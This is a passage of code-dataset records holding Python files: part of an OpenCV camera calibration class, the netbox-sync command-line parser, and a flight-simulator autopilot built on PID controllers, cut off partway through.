centerPrincipalPoint=center_principal_point\n )\n logging.debug(\"Calculating new camera matrix - Complete.\")\n\n def generate_maps(self):\n logging.debug(\"Generating maps\")\n logging.debug(\"Generating distortion map\")\n self.map_x, self.map_y = cv2.initUndistortRectifyMap(self.original_camera_matrix, self.coefficients, None,\n self.new_camera_matrix, self.image_size, 5)\n logging.debug(\"Generating distortion map - Complete\")\n #self._generate_reverse_map()\n logging.debug(\"Generating maps - Complete.\")\n\n def save_results(self, additional_string=\"\", csv=True):\n timestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y_%m_%d__%H_%M_%S')\n directory = \"results/{}_{}/\".format(timestamp, additional_string)\n if os.path.exists(directory):\n logging.error(\"directory {} already exists. 
Results not saved.\".format(directory))\n            return\n        os.makedirs(directory)\n\n        np.save(\"{}dist_coeffs.npy\".format(directory), self.coefficients)\n        np.save(\"{}original_camera_matrix.npy\".format(directory), self.original_camera_matrix)\n        np.save(\"{}alpha.npy\".format(directory), self.alpha)\n        logging.debug(\"Results saved in numpy format\")\n        self._save_cvs_results(directory)\n\n        logging.info(\"Saving results - Complete.\")\n\n\n    def _save_cvs_results(self, directory):\n        csv_directory = \"{}csv/\".format(directory)\n        os.makedirs(csv_directory)\n\n        np.savetxt(\"{}dist_coeffs.csv\".format(csv_directory), self.coefficients, delimiter=\", \")\n        np.savetxt(\"{}original_camera_matrix.csv\".format(csv_directory), self.original_camera_matrix, delimiter=\", \")\n        np.savetxt(\"{}alpha.csv\".format(csv_directory), [self.alpha], delimiter=\", \")\n\n        # np.savetxt(\"{}map_x.csv\".format(csv_directory), self.map_x, delimiter=\", \")\n        #np.savetxt(\"{}map_y.csv\".format(csv_directory), self.map_y, delimiter=\", \")\n\n        #Maps are originally in floats, but Integer versions are smaller\n        np.savetxt(\"{}int_map_x.csv\".format(csv_directory), np.rint(self.map_x).astype(int), delimiter=\", \", fmt=\"%4i\")\n        np.savetxt(\"{}int_map_y.csv\".format(csv_directory), np.rint(self.map_y).astype(int), delimiter=\", \", fmt=\"%4i\")\n        #np.savetxt(\"{}int_reverse_map_x.csv\".format(csv_directory), np.rint(self.reverse_map_x).astype(int), delimiter=\", \", fmt=\"%4i\")\n        #np.savetxt(\"{}int_reverse_map_y.csv\".format(csv_directory), np.rint(self.reverse_map_y).astype(int), delimiter=\", \", fmt=\"%4i\")\n\n    def load_results(self, timestamp):\n        logging.debug(\"Loading results from '{}'\".format(timestamp))\n        directory = \"results/{}/\".format(timestamp)\n\n        self.coefficients = np.load(\"{}dist_coeffs.npy\".format(directory))\n        self.original_camera_matrix = np.load(\"{}original_camera_matrix.npy\".format(directory))\n        self.alpha = np.load(\"{}alpha.npy\".format(directory))\n\n        self.new_camera_matrix = self.original_camera_matrix\n        logging.debug(\"Loading results - Complete\")\n\n    def distort_point(self, point):\n        return self._remap_point(point, (self.map_x, self.map_y))\n\n    #def undistort_point(self, point):\n        #return self._remap_point(point, (self.reverse_map_x, self.reverse_map_y))\n\n    @staticmethod\n    def _remap_point(point, maps):\n        map_x, map_y = maps\n        x, y = point\n        return map_x[y][x], map_y[y][x]\n\n    \"\"\"\n    def _generate_reverse_map(self):\n        logging.debug(\"Generating undistort(reverse) map\")\n        # Currently generates reverse map with same size\n        self.reverse_map_x = np.empty_like(self.map_x)\n        self.reverse_map_y = np.empty_like(self.map_y)\n        self.reverse_map_x[:] = np.NAN\n        self.reverse_map_y[:] = np.NAN\n\n        for row_no, rows in enumerate(zip(self.map_x, self.map_y)):\n            for col_no, elements in enumerate(zip(*rows)):\n                try:\n                    self.reverse_map_x[elements[1]][elements[0]] = col_no\n                    self.reverse_map_y[elements[1]][elements[0]] = row_no\n                except IndexError:\n                    pass\n        logging.debug(\"Initial reverse map generated, now eliminating NaNs if any\")\n        while np.isnan(self.reverse_map_x).any():\n            temp_x = self.reverse_map_x.copy()\n            temp_y = self.reverse_map_y.copy()\n\n            #Count the number of NAN's for debugging\n            number_of_NANs = np.count_nonzero(~np.isnan(temp_x))\n            assert number_of_NANs == np.count_nonzero(~np.isnan(temp_y)), \"map_y must contain as many NAN's as does map_x\"\n            logging.debug(\"Number of NAN-values: {}\".format(number_of_NANs))\n\n            #Iterate through the map looking for NAN values\n            for row_no, row in enumerate(temp_x):\n                for 
col_no, element in enumerate(row):\n                    if np.isnan(element):\n                        #NAN found,\n                        #Iterate through adjacent cells and try to find value there\n                        for i in (1, -1):\n                            for j in (1, -1):\n                                try:\n                                    adjecent_x = self.reverse_map_x[row_no + i][col_no + j]\n                                    adjecent_y = self.reverse_map_y[row_no + i][col_no + j]\n                                except IndexError:\n                                    pass\n                                else:\n                                    if not np.isnan(adjecent_x) and not np.isnan(adjecent_y):\n                                        temp_x[row_no][col_no] = adjecent_x\n                                        temp_y[row_no][col_no] = adjecent_y\n            self.reverse_map_x = temp_x\n            self.reverse_map_y = temp_y\n\n        logging.debug(\"Generating undistort(reverse) map - Complete\")\n    \"\"\"\n\n    def plot(self):\n        screen_x = (0, 0, self.image_size[0], self.image_size[0], 0)\n        screen_y = (0, self.image_size[1], self.image_size[1], 0, 0)\n\n        plt.figure(1)\n        plt.subplot(121)\n        x = self.map_x[::20, ::20].ravel()\n        y = self.map_y[::20, ::20].ravel()\n        plt.plot(x, y, 'r.', markersize=1)\n        plt.plot(screen_x, screen_y, 'k-')\n\n        #plt.subplot(122)\n        #x = self.reverse_map_x.ravel()\n        #y = self.reverse_map_y.ravel()\n        #plt.plot(x, y, 'g.', markersize=1)\n        #plt.plot(screen_x, screen_y, 'k-')\n\n        plt.show()\n","repo_name":"zidik/TelliskiviCameraCalibration","sub_path":"camera_calibrator.py","file_name":"camera_calibrator.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"73289835984","text":"import os\n\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\n\nfrom module.common.logging import valid_log_levels\nfrom module.config import default_config_file_path\nfrom module import __version__, __version_date__, __url__\n\n\ndef parse_command_line(self_description=None):\n    \"\"\"\n    parse command line arguments, also add current version and version date to description\n\n    Parameters\n    ----------\n    self_description: str\n        short self description of this program\n\n    Returns\n    -------\n    ArgumentParser object: with parsed command line arguments\n    \"\"\"\n\n    # define command line options\n    description = f\"{self_description}\\nVersion: {__version__} ({__version_date__})\\nProject URL: {__url__}\"\n\n    parser = ArgumentParser(\n        description=description,\n        formatter_class=RawDescriptionHelpFormatter)\n\n    parser.add_argument(\"-c\", \"--config\", default=[], dest=\"config_files\", nargs='+',\n                        help=f\"points to the config file to read config data from if it is not installed \"\n                             f\"under the default path '{default_config_file_path}'\",\n                        metavar=os.path.basename(default_config_file_path))\n\n    parser.add_argument(\"-g\", \"--generate_config\", action=\"store_true\",\n                        help=\"generates default config file.\")\n\n    parser.add_argument(\"-l\", \"--log_level\", choices=valid_log_levels,\n                        help=\"set log level (overrides config)\")\n\n    parser.add_argument(\"-n\", \"--dry_run\", action=\"store_true\",\n                        help=\"Operate as usual but don't change anything in NetBox. Great if you want to test \"\n                             \"and see what would be changed.\")\n\n    parser.add_argument(\"-p\", \"--purge\", action=\"store_true\",\n                        help=\"Remove (almost) all synced objects which were created by this script. 
\"\n \"This is helpful if you want to start fresh or stop using this script.\")\n\n args = parser.parse_args()\n\n # fix supplied config file path\n fixed_config_files = list()\n for config_file in args.config_files:\n\n if len(config_file) == 0:\n continue\n\n if config_file != default_config_file_path and config_file[0] != os.sep:\n config_file = os.path.realpath(os.getcwd() + os.sep + config_file)\n fixed_config_files.append(config_file)\n\n args.config_files = fixed_config_files\n\n return args\n\n# EOF\n","repo_name":"bb-Ricardo/netbox-sync","sub_path":"module/common/cli_parser.py","file_name":"cli_parser.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":226,"dataset":"github-code","pt":"48"} +{"seq_id":"16278544232","text":"from guage import globaltime\n#class AP_Lmode_c(AP_c):\n\t#Class of all the Horizontal modes in AP\nimport config\n\n\t\nclass AP_c(object):\n\t#The main autopilot class.\n\t#This is inbetween the PFD FMA and The FSX autopilot, to emulate the RJ AP correctly.\n\t\n\tdef __init__(self, PFD, attitude, global_time, aircraft):\n\t\tself.AP_on = False #Autopilot on or off\n\t\tself.Lmode = AP_Lmode_c(PFD.FMA.LNav_act, PFD.FMA.LNav_arm, globaltime.value, aircraft)\n\t\tself.Vmode = AP_Vmode_c(PFD.FMA.VNav_act, PFD.FMA.VNav_arm, globaltime.value, aircraft)\n\t\tself.FD_on = False\n\t\tself.attitude = attitude #attitude guage\n\t\tself.aircraft = aircraft\n\t\t#self.aileron_pos = 0 #The aileron position sent to FSX -16383 to 16383\n\t\tif config.debug_AP:\n\t\t\tself.lnav_debug = open(\"lnav.txt\",\"w\")\n\t\t\tself.lnav_debug.seek(0)\n\t\t\tself.vnav_debug = open(\"vnav.txt\",\"w\")\n\t\t\tself.vnav_debug.seek(0)\n\tdef quit(self):\n\t\tif config.debug_AP:\n\t\t\tself.lnav_debug.close()\n\t\t\tself.vnav_debug.close()\n\t\t\t\n\tdef AP_turnon(self):\n\t\tself.AP_on = True\n\t\tself.FD_turnon()\n\t\t\n\tdef AP_turnoff(self):\n\t\tself.AP_on = False\n\t\t\n\tdef AP_cycle(self):\n\t\tif self.AP_on:\n\t\t\t#If AP on then turn off\n\t\t\tself.AP_turnoff()\n\t\telse: #If AP off then turn on\n\t\t\tself.AP_turnon()\n\t\n\t\n\tdef comp(self, aircraft):\n\t\tself.Lmode.control(aircraft)\n\t\tself.Vmode.control(aircraft)\n\t\tif self.AP_on:\n\t\t\t#Debug\n\t\t\tif config.debug_AP:\n\t\t\t\tself.lnav_debug.write(\"%s,%s\\n\" %(self.Lmode.active.text, self.Lmode.active.debug_text))\n\t\t\t\tself.vnav_debug.write(\"%s,%s\\n\" %(self.Vmode.active.text, self.Vmode.active.debug_text))\n\t\t\tif config.mode != config.TEST:\n\t\t\t\taircraft.sevent.eventlist.list[self.aileron_pos.event_id].send()\n\t\t\t\taircraft.sevent.eventlist.list[self.elevtrim_pos.event_id].send()\n\tdef FD_turnon(self):\n\t\tif self.FD_on == False:\n\t\t\tself.FD_on = True\n\t\t\tself.Lmode.turnon()\n\t\t\tself.Vmode.turnon()\n\t\tself.attitude.FD_active.value =-1\n\t\t\n\tdef FD_turnoff(self):\n\t\tself.FD_on = False\n\t\tself.Lmode.turnoff()\n\t\tself.Vmode.turnoff()\n\t\tself.attitude.FD_active.value =0\n\n\t\t\n\tdef FD_cycle(self):\n\t\tif not (self.AP_on): #If APon do nothing\n\t\t\t\tif self.FD_on: #If FD on then turn off\n\t\t\t\t\tself.FD_turnoff()\n\t\t\t\telse: #If FD off then turn on\n\t\t\t\t\tself.FD_turnon() \n\t\t\t\n\tdef HDG_button(self):\n\t\tif self.Lmode.active != self.Lmode.HDG:\n\t\t\tself.Lmode.set_active(self.Lmode.HDG)\n\t\t\tself.FD_turnon() #make sure FD is on\n\t\telse:\n\t\t\tself.Lmode.set_active(self.Lmode.ROLL)\n\t\t\t\n\tdef PTCH_inc(self):\n\t\tself.PTCH_but(1)\n\t\t#self.Vmode.PTCH.desired_pitch += 
0.5\n\t\t#self.Vmode.set_active(self.Vmode.PTCH)\n\t\t#self.FD_turnon()\n\t\t\n\tdef PTCH_dec(self):\n\t\tself.PTCH_but(-1)\n\t\t#self.Vmode.PTCH.desired_pitch -= 0.5\n\t\t#self.Vmode.set_active(self.Vmode.PTCH)\n\t\t#self.FD_turnon()\n\t\t\n\tdef PTCH_but(self, value): #Called if either pitch up or pitch down pressed\n\t\tif self.Vmode.active == self.Vmode.VS:\n\t\t\tself.Vmode.VS.VS_ref += (0.1 * value)\n\t\t\tself.Vmode.VS.check_VS_ref() #Make sure between 8 and -8\n\t\t\tself.Vmode.FMA_update(False) #No need to flash; mode is not changing\n\t\telif self.Vmode.active == self.Vmode.PTCH:\n\t\t\tself.Vmode.PTCH.desired_pitch += (0.5 * value)\n\t\telse: #Not in VS or PTCH mode\n\t\t\tself.Vmode.PTCH.desired_pitch = int(self.aircraft.attitude.pitch.value * 2) / 2.0 #Will round to nearest 0.5\n\t\t\tself.Vmode.set_active(self.Vmode.PTCH)\n\t\t\tself.FD_turnon()\n\t\t\t\n\tdef ALT_button(self):\n\t\tpass\n\t\n\tdef ALT_inc(self):\n\t\tself.aircraft.altimeter.bug_inc()\n\t\t\n\tdef ALT_dec(self):\n\t\tself.aircraft.altimeter.bug_dec()\n\t\t\n\tdef VS_button(self):\n\t\tif self.Vmode.active != self.Vmode.VS:\n\t\t\tself.Vmode.VS.VS_ref = int(self.aircraft.VSI.value / 100.0) / 10.0\n\t\t\tself.Vmode.VS.check_VS_ref()\n\t\t\tself.Vmode.set_active(self.Vmode.VS)\n\t\t\tself.FD_turnon() #make sure FD is on\n\t\n\t\telse:\n\t\t\tself.Vmode.set_active(self.Vmode.PTCH)\n\t\n\t\n\t\t\n\t\t\nclass AP_Vmode_c(AP_c):\n\t#Class of all the Vertical modes in AP\n\tdef __init__(self, act_disp, arm_disp, global_time, aircraft):\n\t\tself.PTCH = Pitch(global_time, aircraft)\n\t\tself.ALTS = Alt_Mode(global_time, aircraft)\n\t\tself.VS = Vert_Speed(global_time, aircraft)\n\t\tself.BLANK = Blank()\n\t\tself.on = False\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.act_disp = act_disp #FMA disp for active and armed fields\n\t\tself.arm_disp = arm_disp\n\t\tself.aircraft = aircraft\n\t\t\n\tdef control(self, aircraft):\n\t\tif self.active == self.PTCH:\n\t\t\tself.PTCH.control(aircraft)\n\t\t\tif self.ALTS.check_capture(aircraft):\n\t\t\t\tself.set_active(self.ALTS)\n\t\telif self.active == self.VS:\n\t\t\tself.VS.control(aircraft)\n\t\t\tif self.ALTS.check_capture(aircraft):\n\t\t\t\tself.set_active(self.ALTS)\n\t\t#elif self.active == self.HDG:\n\t\t#\tself.HDG.control(self.ROLL, aircraft)\n\tdef FMA_update(self, flash = True):\n\t\t#Update the FMA\n\t\tself.act_disp.text = self.active.text\n\t\tself.act_disp.end_arrow = self.active.end_arrow\n\t\tif flash: self.act_disp.flash()\n\t\tself.arm_disp.text = self.arm.text\n\t\tself.arm_disp.end_arrow = 0 #Always no arrow on arm\n\tdef set_active(self, mode):\n\t\tif self.active != mode:\n\t\t\tself.active = mode\n\t\t\tmode.turnon(True)\n\t\t\tif self.active == self.PTCH:\n\t\t\t\tself.arm = self.ALTS\n\t\t\tif self.active == self.VS:\n\t\t\t\tself.arm = self.ALTS\n\t\t\tself.FMA_update()\n\t\telse:#mode is already on, so only reset the P, I, and D values so AP doesn't jump.\n\t\t\tmode.turnon(False)\n\tdef turnon(self):\n\t\t#This is used to turn on vertical mode when FD or AP is turned on.\n\t\tif self.active == self.BLANK:\n\t\t\tself.set_active(self.PTCH)\n\t\t#Need to finalize logic diagram.\n\t\tself.FMA_update()\n\t\tself.on = True\n\tdef turnoff(self):\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.FMA_update()\n\t\tself.on = False\n\t\n\t\t\nclass AP_Lmode_c(AP_c):\n\t#Class of all the Lateral modes in AP\n\tdef __init__(self, act_disp, arm_disp, global_time, aircraft):\n\t\tself.ROLL = Roll(global_time, 
aircraft)\n\t\tself.HDG = Heading(global_time, aircraft)\n\t\tself.BLANK = Blank()\n\t\tself.on = False\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.act_disp = act_disp #FMA disp for active and armed fields\n\t\tself.arm_disp = arm_disp\n\t\tself.aircraft = aircraft\n\t\t\n\tdef control(self, aircraft):\n\t\tif self.active == self.ROLL:\n\t\t\tself.ROLL.control(aircraft)\n\t\telif self.active == self.HDG:\n\t\t\tself.HDG.control(self.ROLL, aircraft)\n\tdef FMA_update(self, flash=True):\n\t\t#Update the FMA\n\t\tself.act_disp.text = self.active.text\n\t\tself.act_disp.end_arrow = self.active.end_arrow\n\t\tif flash: self.act_disp.flash()\n\t\tself.arm_disp.text = self.arm.text\n\t\tself.arm_disp.end_arrow = 0 #Always no arrow on arm\n\t\t\n\tdef set_active(self, mode):\n\t\tif self.active != mode:\n\t\t\tself.active = mode\n\t\t\tmode.turnon(True)\n\t\t\tself.FMA_update()\n\t\telse: #mode is already on, so reset the P, I, and D values so AP doesn't jump.\n\t\t\tmode.turnon(False)\n\tdef turnon(self):\n\t\tif self.active == self.BLANK:\n\t\t\tself.set_active(self.ROLL)\n\t\t\n\t\tself.FMA_update()\n\t\tself.on = True\n\t\t\n\tdef turnoff(self):\n\t\tself.active = self.BLANK\n\t\tself.arm = self.BLANK\n\t\tself.FMA_update()\n\t\tself.on = False\n\t\nclass Alt_Mode(AP_Vmode_c): #ALTS\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"ALTS\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.debug_text = \"\"\n\t\t#PID Controller here\n\t\t#Altitude capture per brother at 3000fpm start capture at 1000 ft out, 500fpm start capture at 50ft\n\t\tself.ALT_PID = PID2_c(-1, global_time, None, 0)\n\t\tself.ALT_PID.set_gains(0.003, (200000), (0.0000001)) #Set I and P gains to make controller P only\n\t\tself.ALT_PID.set_u_limit(8.0) #Limit it to 8000 fpm\n\t\tself.ALT_PID.set_I_limit(0.0001)\n\tdef control(self, aircraft):\n\t\t#Outputs desired VS to get to capture altitude\n\t\tself.ALT_PID.calc(aircraft.altimeter.indicated.value, aircraft.altimeter.bug.value, aircraft.global_time)\n\t\tself.debug_text = self.ALT_PID.debug\n\tdef turnon(self, reset):\n\t\tpass\n\t\n\tdef check_capture(self, aircraft): #Used to check if capture is needed\n\t\tcapture = False\n\t\tself.control(aircraft)\n\t\tvs = self.ALT_PID.out * 1000\n\t\tif vs>=0: #If desired vs + then climb needed to obtain ALT bug.\n\t\t\tif aircraft.VSI.value >= vs: #if aircraft vs > desired vs then\n\t\t\t\tcapture = True\t#Initiate ALT capture\t\n\t\telse: #vs<0 descent needed to obtain ALT bug\n\t\t\tif aircraft.VSI.value <= vs: \n\t\t\t\tcapture = True\n\t\t\t\t\n\t\t#print vs, aircraft.VSI.value\n\t\treturn capture\nclass Vert_Speed(AP_Vmode_c):\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"VS\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\t#PID Controller here\n\t\tself.VS_PID = PID3_c(10000, global_time, aircraft.elev_trim, -16383)\n\t\tself.VS_PID.set_gains((0.18* 0.6), (5.5/2), (5.5/8.0))\n\t\tself.VS_PID.set_I_limit(0.4)\n\t\tself.VS_PID.set_u_limit(0.3)\n\t\t#VS reference\n\t\tself.VS_ref = 0\n\t\tself.debug_text = \"\"\n\t\t\n\t\t\t\n\tdef check_VS_ref(self):\n\t\tif self.VS_ref < -8.0: self.VS_ref = -8.0\n\t\tif self.VS_ref > 8.0: self.VS_ref = 8.0\n\t\tself.determine_text()\n\t\t\n\tdef determine_text(self):\n\t\tself.text = \"VS %2.1f\" %abs(self.VS_ref)\n\t\tif self.VS_ref >=0.0: \n\t\t\tself.end_arrow = 1\n\t\telse:\n\t\t\tself.end_arrow = -1\n\t\n\tdef control(self, aircraft):\n\t\tself.VS_PID.calc(aircraft.VSI.value/ 
1000.0, self.VS_ref, aircraft.global_time)\n\t\taircraft.AP.elevtrim_pos.value = int(self.VS_PID.out)\n\t\t#Need to jerry rig FD here\n\t\n\tdef turnon(self, reset):\n\t\tself.VS_PID.turn_on(self.aircraft.attitude.pitch.value)\n\t\t\n#Each mode has its own class , with common functions to be processed.\t\t\t\nclass Pitch(AP_Vmode_c):\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"PTCH\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.debug_text = \"\"\n\t\tself.pitch_PID = PID2_c(10000, global_time, aircraft.elev_trim, -16383)\n\t\t#(0.08), (2 /1.5), (0.4), (1.5/ 8.0), 0.8, -0.8, 1.2, 1.0, 0.1, global_time)\n\t\tself.pitch_PID.set_gains((0.08), (2/1.5), (1.5/8))\n\t\tself.pitch_PID.set_I_limit(0.4)\n\t\tself.pitch_PID.set_u_limit(0.8)\n\t\tself.pitch_PID.set_Roc_curve(1.2, 1.0, 0.1)\n\t\tself.desired_pitch = 0.0 #This is what pitch PTCH mode will hold\n\tdef control(self, aircraft):\n\t\tself.pitch_PID.calc(aircraft.attitude.pitch.value, self.desired_pitch, aircraft.global_time)\n\t\tself.debug_text = self.pitch_PID.debug\n\t\t#print self.bank_PID.Kp, self.bank_PID.P, self.bank_PID.I, self.bank_PID.D, globaltime.value\n\t\taircraft.AP.elevtrim_pos.value = int(self.pitch_PID.out)\n\t\taircraft.attitude.FD_pitch.value = self.desired_pitch\n\t\t\n\tdef turnon(self, reset):\n\t\t\n\t\tif reset: self.reset_desired_pitch()\n\t\tself.pitch_PID.turn_on(self.desired_pitch)\n\t\t#self.pitch_PID.turn_on(self.aircraft.attitude.pitch.value)\n\tdef reset_desired_pitch(self):\n\t\t#If pitch mode active will hold current pitch\n\t\tself.desired_pitch = self.aircraft.attitude.pitch.value\n\t\t\n\t\n\nclass Roll(AP_Lmode_c):\n\t#The Roll mode. If at time of activation if under 5 degrees of bank, then AP hold 0 bank, if >5degree holds that degree.\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"ROLL\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.debug_text = \"\"\n\t\t#self.PID = PID_c(0.5, 0.1, 0.2, 0.0, 0.01, 0.000001, 1.0, -1.0, global_time)\n\t\tself.bank_PID = PID2_c(-16383, global_time, aircraft.aileron_pos, -16383)\n\t\tself.bank_PID.set_gains((0.35* 0.5), (2/1.5), (1.5 /8))\n\t\t#self.bank_PID.set_gains((0.25* 0.5), (2/1.5), (1.5 /8))\n\t\tself.bank_PID.set_I_limit(0.4)\n\t\tself.bank_PID.set_u_limit(0.6)\n\t\tself.bank_PID.set_Roc_curve(66.0, 0.2, 10000.3)\n\t\tself.desired_bank = 0.0 #This is what bank ROLL mode will hold\n\tdef control(self, aircraft):\n\t\tself.bank_PID.calc(aircraft.attitude.bank.value, self.desired_bank, aircraft.global_time)\n\t\tself.debug_text = self.bank_PID.debug\n\t\t#print self.bank_PID.Kp, self.bank_PID.P, self.bank_PID.I, self.bank_PID.D, globaltime.value\n\t\taircraft.AP.aileron_pos.value = int(self.bank_PID.out)\n\t\taircraft.attitude.FD_bank.value = self.desired_bank\n\t\t\n\tdef turnon(self, reset= False):\n\t\tself.bank_PID.turn_on(self.aircraft.attitude.bank.value)\n\t\tif reset: self.reset_desired_bank()\n\t\t\n\tdef reset_desired_bank(self):\n\t\t#If current aircraft bank is less than 5deg, then 0 otherwise hold current bank.\n\t\ttemp = self.aircraft.attitude.bank.value\n\t\t\n\t\tif (-5.0 < temp < 5.0):\n\t\t\tself.desired_bank = 0.0\n\t\telse:\n\t\t\tself.desired_bank = temp\n\t\t\t\n\t\t\n\t\nclass Blank(object):\n\t#This is for a blank display, if AP is off, or no armed mode.\n\tdef __init__(self):\n\t\tself.text = \"\"\n\t\tself.end_arrow = 0\n\t\tself.debug_text = \"\"\n\tdef control(self, aircraft):\n\t\t#DO NOTHING\n\t\tpass\n\t\n\tdef turnon(self, reset = 
False):\n\t\tpass\n\t\nclass Heading(AP_Lmode_c):\n\tdef __init__(self, global_time, aircraft):\n\t\tself.text = \"HDG\"\n\t\tself.end_arrow = 0\n\t\tself.aircraft = aircraft\n\t\tself.heading_PID = PID2_c(-30.0, global_time, aircraft.attitude.bank, -30.0)\n\t\tself.heading_PID.set_gains((0.08), (5), (0.00001))\n\t\tself.heading_PID.set_I_limit(0.05)\n\t\tself.heading_PID.set_u_limit(1.0)\n\t\t#self.heading_PID.out = 0.0\n\t\tself.debug_text = \"\"\n\t\t\n\tdef control(self, ROLL, aircraft):\n\t\tself.heading_PID.calc(aircraft.HSI.Mag_Heading.value, aircraft.HSI.Heading_Bug.value, aircraft.global_time, True)\n\t\tself.debug_text = self.heading_PID.debug\n\t\tROLL.desired_bank = -self.heading_PID.out\n\t\tROLL.control(aircraft)\n\t\t\n\tdef turnon(self, reset=False):\n\t\tpass\n\nclass PID_c(AP_c):\n\t\n\tdef __init__(self, Kp, alpha, beta, gamma, Ti, Td, u_max, u_min, global_time):\n\t\tself.Kp = Kp #0.5\n\t\tself.beta = beta #0.2\n\t\tself.alpha = alpha #0.1\n\t\tself.gamma = gamma #0.0\n\t\tself.Ti = Ti #0.01\n\t\tself.Td = Td #0.000001\n\t\tself.u_min = u_min #-1.0\n\t\tself.u_max = u_max #1.0\n\t\tself.u = 0.0\n\t\tself.eDf_prev = 0.0\n\t\tself.eDf_prevprev = 0.0\n\t\tself.eP_prev = 0.0\n\t\tself.last_time = global_time\n\t\t\n\t\n\tdef calc(self,measured, reference, time):\n\t\t\n\t\t#Just calculate it\n\t\tTs = time- self.last_time\n\t\tself.last_time = time\n\t\tif Ts <= 0.0: Ts = 0.0001\n\t\terror = measured - reference\n\t\teP = self.beta * error\n\t\teD = self.gamma * error\n\t\t#Deriviative Part\n\t\tTsoverTf = Ts / (self.alpha * self.Td)\n\t\teDf = self.eDf_prev / (TsoverTf +1) + eD *TsoverTf / (TsoverTf +1)\n\t\tD = self.Td / Ts * (eDf - 2 *self.eDf_prev + self.eDf_prevprev)\n\t\t#Integral Part\n\t\tI = Ts / self.Ti * error\n\t\t#Proportianal Part\n\t\tP = eP - self.eP_prev\n\t\tself.u += self.Kp * (P+I+D)\n\t\t#Check for max deflection\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.eP_prev = eP\n\t\tself.eDf_prevprev = self.eDf_prev\n\t\tself.eDf_prev = eDf\n\t\t\nclass PID2_c(AP_c):\n\t\n\tdef __init__(self, multiplier, global_time, output_ref, output_ref_factor = 1.0):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.output_ref = output_ref #only used during turn_on method so control surfaces don't jump. 
(Preloads I)\n\t\tself.output_ref_factor = output_ref_factor #used in case output_ref need to by multipled by a factor\n\t\tself.Kp = 1.0 #0.5\n\t\tself.Ti = 1.0\n\t\tself.Td = 1.0\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.last_time = global_time\n\t\tself.prev_error = 0.0\n\t\tself.I = 0.0\n\t\tself.P = 0.0\n\t\tself.D = 0.0\n\t\tself.I_limit = 1.0 / self.Kp\n\t\tself.max_Roc = 100000.0\n\t\tself.min_Roc = 10000.0\n\t\tself.Ref = 0.0\n\t\tself.curve_slope = 10000.0\n\t\tself.max_Roc_limit = 0.0\n\t\tself.out = 0.0\n\t\tself.debug = \"\" #Debug text\n\tdef set_gains(self, Kp, Ti, Td):\n\t\tself.Kp = Kp\n\t\tself.Ti = Ti\n\t\tself.Td = Td\n\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\t\t\n\tdef set_I_limit(self, I_limit):\n\t\tself.I_limit = I_limit / self.Kp\n\t\n\tdef set_Roc_curve(self, max, min, slope):\n\t\tself.max_Roc = max\n\t\tself.min_Roc = min\n\t\tself.curve_slope = slope\n\t\t\n\tdef turn_on(self, current_reference):\n\t\t#This is used to set the u and prev_error correctly, so when AP turn on, control wont jump.\n\t\tself.I = (self.output_ref.value * self.output_ref_factor / self.multiplier) / self.Kp\n\t\tself.Ref = current_reference\n\t\tself.prev_error = 0.0\n\t\n\tdef calc(self,measured, reference, time, check180 = False):\n\t\t#check180 will make sure error is within +/- 180 used for heading hold.\n\t\t#Just calculate it\n\t\tdt = time - self.last_time\n\t\t#Main part of PID controller\n\t\tif dt <= 0.0: dt = 0.001 #prevent divide by 0\n\t\t\n\t\tself.last_time = time\n\t\t\n\t\t#Slow down change of reference with curve\n\t\t#self.max_Roc_limit += self.curve_slope # * dt * 3\n\t\tself.max_Roc_limit = self.max_Roc\n\t\tif self.max_Roc_limit > self.max_Roc:\n\t\t\tself.max_Roc_limit = self.max_Roc\n\t\tmax = dt * self.max_Roc_limit\n\t\tmin = dt * self.min_Roc \n\t\tcurve = (reference - self.Ref) * self.curve_slope * dt\n\t\t\n\t\t#if curve >0:\n\t#\t\tsign = 1\n\t\t#else: sign = -1\n\t\ta_curve = abs(curve)\n\t\tif a_curve > max:\n\t\t\ta_curve = max\n\t\telse:\n\t\t\t#Curve is limiting max therefore make roc limit equal to curve\n\t\t\tself.max_Roc_limit = a_curve / dt\n\t\t\tif a_curve < min:\n\t\t\t\ta_curve = min\n\t\t\n\t\tif reference > self.Ref:\n\t\t\t#if a_curve == max:\n\t\t\t#\tself.Ref = measured + a_curve\n\t\t\t#else:\n\t\t\tself.Ref += a_curve\n\t\t\tif self.Ref > reference:\n\t\t\t\tself.Ref = reference\n\t\telse: #reference < self.Ref\n\t\t\t#if a_curve == max:\n\t\t\t#\tself.Ref = measured - a_curve\n\t\t\t#else:\n\t\t\tself.Ref -= a_curve\n\t\t\tif self.Ref < reference:\n\t\t\t\tself.Ref = reference\n\t\t\t\t\n\t\t\n\t\t#Find overall error\n\t\terror = measured - self.Ref\n\t\t#This makes sure error is within +/-180 only used for heading hold.\n\t\tif check180:\n\t\t\tif error<-180.0: error+=360.0\n\t\t\telif error>180.0: 